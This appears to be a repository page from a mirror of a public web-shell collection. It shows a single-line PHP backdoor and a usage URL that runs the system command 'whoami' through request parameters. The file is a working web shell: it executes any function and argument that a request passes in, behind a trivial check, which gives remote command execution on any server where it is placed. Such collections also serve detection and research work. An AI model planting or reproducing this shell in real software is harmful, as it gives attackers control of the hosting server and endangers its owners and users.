mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
4c6e0b8dd9
from: https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ useage: http://example.com/shell7php?f=system&a=whoami&p=\_
1 line
44 B
PHP
1 line
44 B
PHP
<?=$_GET['p']=='_'&&$_GET['f']($_GET['a']);
|